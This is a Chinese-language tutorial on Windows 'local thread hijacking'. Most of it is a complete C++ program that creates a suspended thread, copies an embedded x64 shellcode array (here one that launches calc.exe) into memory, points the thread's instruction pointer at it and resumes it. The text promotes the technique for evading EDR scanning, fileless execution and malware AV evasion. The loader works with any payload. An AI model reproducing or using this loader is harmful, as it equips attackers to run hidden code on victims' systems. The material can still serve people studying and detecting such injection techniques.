线程劫持#
线程劫持(Thread Hijacking)是一种在Windows系统下常见的代码注入与执行技术,广泛应用于红队攻击、渗透测试、恶意软件免杀等领域。
局部线程创建是线程劫持的一种实现方式,也被称为“本地线程劫持”或“挂起线程创建后劫持”。
线程劫持的核心思想#
创建一个被挂起的线程(Suspended Thread),修改其执行上下文(Context),将指令指针(RIP/EIP)指向我们准备好的Shellcode,再恢复线程执行,从而达到执行任意代码的目的。
这种方式相比于直接使用 CreateThread 执行Shellcode,具有更强的隐蔽性,因为:
- 线程是合法创建的(调用
CreateThread是正常API) - Shellcode 并非直接作为线程入口,而是通过修改上下文注入,绕过部分EDR的直接内存扫描
- 可实现无文件落地、内存执行
本地线程劫持的流程#
- 通过设置dwCreationFlag ↗参数创建一个被挂起的线程(CREATE_SUSPENDED)
- 分配内存并写入Shellcode
- 获取该线程的上下文(GetThreadContext ↗)
- 修改上下文中的指令指针(RIP/EIP)指向Shellcode地址
- 设置线程上下文(SetThreadContext ↗)
- 恢复线程执行(ResumeThread ↗)
C++实现#
#include <windows.h>
#include <iostream>
// 示例:弹出计算器的Shellcode(Windows x64)
unsigned char buf[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
"\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
"\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
"\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"
"\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"
"\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
"\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
"\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
"\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b"
"\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd"
"\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
"\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";
int main() {
DWORD shellcode_len = sizeof(buf);
// 1. 创建一个被挂起的线程(入口函数可以是任意函数,这里用MessageBox)
HANDLE hThread = CreateThread(
NULL, // 安全属性
0, // 栈大小
(LPTHREAD_START_ROUTINE)MessageBoxW, // 入口函数(实际不会执行)
NULL, // 参数
CREATE_SUSPENDED, // 创建后挂起
NULL // 线程ID
);
if (hThread == NULL) {
std::cerr << "[-] CreateThread failed: " << GetLastError() << std::endl;
return -1;
}
std::cout << "[+] Suspended thread created: " << hThread << std::endl;
// 2. 分配可执行内存并写入Shellcode
LPVOID pShellcode = VirtualAlloc(
NULL,
shellcode_len,
MEM_COMMIT | MEM_RESERVE,
PAGE_READWRITE
);
if (pShellcode == NULL) {
std::cerr << "[-] VirtualAlloc failed: " << GetLastError() << std::endl;
CloseHandle(hThread);
return -1;
}
memcpy(pShellcode, buf, shellcode_len);
// 3. 修改内存权限为可执行
DWORD oldProtect;
if (!VirtualProtect(pShellcode, shellcode_len, PAGE_EXECUTE_READ, &oldProtect)) {
std::cerr << "[-] VirtualProtect failed: " << GetLastError() << std::endl;
VirtualFree(pShellcode, 0, MEM_RELEASE);
CloseHandle(hThread);
return -1;
}
// 4. 获取线程上下文
CONTEXT ctx = { 0 };
ctx.ContextFlags = CONTEXT_FULL;
if (!GetThreadContext(hThread, &ctx)) {
std::cerr << "[-] GetThreadContext failed: " << GetLastError() << std::endl;
VirtualFree(pShellcode, 0, MEM_RELEASE);
CloseHandle(hThread);
return -1;
}
// 5. 修改RIP(64位)或 EIP(32位)指向Shellcode
#ifdef _WIN64
ctx.Rip = (DWORD64)pShellcode;
#else
ctx.Eip = (DWORD)pShellcode;
#endif
// 6. 设置修改后的上下文
if (!SetThreadContext(hThread, &ctx)) {
std::cerr << "[-] SetThreadContext failed: " << GetLastError() << std::endl;
VirtualFree(pShellcode, 0, MEM_RELEASE);
CloseHandle(hThread);
return -1;
}
std::cout << "[+] Thread context modified, RIP -> " << pShellcode << std::endl;
// 7. 恢复线程执行,开始执行Shellcode
if (ResumeThread(hThread) == -1) {
std::cerr << "[-] ResumeThread failed: " << GetLastError() << std::endl;
VirtualFree(pShellcode, 0, MEM_RELEASE);
CloseHandle(hThread);
return -1;
}
std::cout << "[+] Thread resumed. Shellcode should be executing..." << std::endl;
// 等待线程结束(可选)
WaitForSingleObject(hThread, INFINITE);
// 清理资源
VirtualFree(pShellcode, 0, MEM_RELEASE);
CloseHandle(hThread);
return 0;
}